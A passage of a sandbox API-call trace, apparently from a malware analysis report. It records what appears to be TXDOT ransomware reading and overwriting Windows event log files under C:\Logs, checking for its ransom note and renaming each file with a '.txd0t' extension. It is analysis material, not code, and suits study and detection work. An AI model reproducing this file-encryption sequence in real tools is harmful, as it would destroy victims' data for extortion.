lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0087.970] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.970] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x11000, lpOverlapped=0x0) returned 1 [0087.974] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.974] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x11000, lpOverlapped=0x0) returned 1 [0087.974] FlushFileBuffers (hFile=0x478) returned 1 [0088.012] GetProcessHeap () returned 0xe30000 [0088.012] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed1580 [0088.012] StrCpyW (in: psz1=0xed1580, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" [0088.012] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned="Microsoft-Windows-AppReadiness%4Admin.evtx" [0088.012] StrCpyW (in: psz1=0xed1598, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.012] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.013] GetProcessHeap () returned 0xe30000 [0088.013] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1580 | out: hHeap=0xe30000) returned 1 [0088.013] CloseHandle (hObject=0x478) returned 1 [0088.013] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx.txd0t")) returned 1 [0088.013] SetEvent (hEvent=0x404) returned 1 [0088.013] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0088.017] StrCpyW (in: psz1=0x414f690, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" [0088.017] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t" [0088.017] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t") returned 0 [0088.018] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0088.018] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0088.018] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0088.018] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.018] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0088.019] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.019] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f650, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f650*=0x11000, lpOverlapped=0x0) returned 1 [0088.022] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.022] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f654, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f654*=0x11000, lpOverlapped=0x0) returned 1 [0088.022] FlushFileBuffers (hFile=0x478) returned 1 [0088.394] GetProcessHeap () returned 0xe30000 [0088.394] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x124) returned 0xe9b648 [0088.394] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" [0088.394] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned="Microsoft-Windows-AppXDeployment%4Operational.evtx" [0088.394] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.394] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.394] GetProcessHeap () returned 0xe30000 [0088.394] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0088.394] CloseHandle (hObject=0x478) returned 1 [0088.394] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx.txd0t")) returned 1 [0088.395] SetEvent (hEvent=0x404) returned 1 [0088.395] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0088.396] StrCpyW (in: psz1=0x414f650, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" [0088.396] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t" [0088.396] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t") returned 0 [0088.396] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", dwFileAttributes=0x80) returned 1 [0088.396] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0088.396] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=1052672) returned 1 [0088.397] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.397] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0088.398] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffefee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.398] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x414f610, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f610*=0x100000, lpOverlapped=0x0) returned 1 [0088.421] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.421] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x414f614, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f614*=0x100000, lpOverlapped=0x0) returned 1 [0088.424] FlushFileBuffers (hFile=0x478) returned 1 [0088.750] GetProcessHeap () returned 0xe30000 [0088.750] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x15c) returned 0xed4320 [0088.750] StrCpyW (in: psz1=0xed4320, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" [0088.750] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" [0088.750] StrCpyW (in: psz1=0xed4338, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.750] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.751] GetProcessHeap () returned 0xe30000 [0088.751] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4320 | out: hHeap=0xe30000) returned 1 [0088.751] CloseHandle (hObject=0x478) returned 1 [0088.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx.txd0t")) returned 1 [0088.751] SetEvent (hEvent=0x404) returned 1 [0088.751] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0088.753] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" [0088.753] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t" [0088.753] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t") returned 0 [0088.753] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", dwFileAttributes=0x80) returned 1 [0088.753] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0088.753] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0088.753] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.753] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0088.754] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.754] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x11000, lpOverlapped=0x0) returned 1 [0088.757] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.757] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x11000, lpOverlapped=0x0) returned 1 [0088.757] FlushFileBuffers (hFile=0x478) returned 1 [0088.924] GetProcessHeap () returned 0xe30000 [0088.924] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x116) returned 0xed17d0 [0088.924] StrCpyW (in: psz1=0xed17d0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" [0088.924] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" [0088.924] StrCpyW (in: psz1=0xed17e8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.924] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.924] GetProcessHeap () returned 0xe30000 [0088.924] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed17d0 | out: hHeap=0xe30000) returned 1 [0088.924] CloseHandle (hObject=0x478) returned 1 [0088.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx.txd0t")) returned 1 [0088.928] SetEvent (hEvent=0x404) returned 1 [0088.930] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0088.930] StrCpyW (in: psz1=0x414f690, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" [0088.930] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.txd0t" [0088.930] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.txd0t") returned 0 [0088.930] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0088.931] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0088.931] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0088.931] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.931] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0088.932] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.932] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f650, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f650*=0x11000, lpOverlapped=0x0) returned 1 [0088.935] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.935] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f654, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f654*=0x11000, lpOverlapped=0x0) returned 1 [0088.937] FlushFileBuffers (hFile=0x478) returned 1 [0088.992] GetProcessHeap () returned 0xe30000 [0088.992] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x122) returned 0xed7f88 [0088.992] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" [0088.992] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned="Microsoft-Windows-International%4Operational.evtx" [0088.992] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0088.992] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0088.992] GetProcessHeap () returned 0xe30000 [0088.992] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0088.992] CloseHandle (hObject=0x478) returned 1 [0088.992] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx.txd0t")) returned 1 [0088.993] SetEvent (hEvent=0x404) returned 1 [0088.993] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0088.998] StrCpyW (in: psz1=0x414f690, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" [0088.998] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t" [0088.998] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t") returned 0 [0088.998] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx", dwFileAttributes=0x80) returned 1 [0088.998] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0088.999] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=1052672) returned 1 [0088.999] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.999] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0089.000] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffefee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.000] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x414f650, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f650*=0x100000, lpOverlapped=0x0) returned 1 [0089.023] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.023] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x414f654, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f654*=0x100000, lpOverlapped=0x0) returned 1 [0089.026] FlushFileBuffers (hFile=0x478) returned 1 [0089.059] GetProcessHeap () returned 0xe30000 [0089.059] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x120) returned 0xed7f88 [0089.059] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" [0089.059] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx") returned="Microsoft-Windows-Kernel-PnP%4Configuration.evtx" [0089.059] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.059] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.059] GetProcessHeap () returned 0xe30000 [0089.059] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.059] CloseHandle (hObject=0x478) returned 1 [0089.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-kernel-pnp%4configuration.evtx.txd0t")) returned 1 [0089.064] SetEvent (hEvent=0x404) returned 1 [0089.064] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0089.066] StrCpyW (in: psz1=0x414f680, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" [0089.066] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t" [0089.066] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t") returned 0 [0089.066] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.066] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-shimengine%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0089.066] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0089.066] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.066] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0089.067] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.067] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, 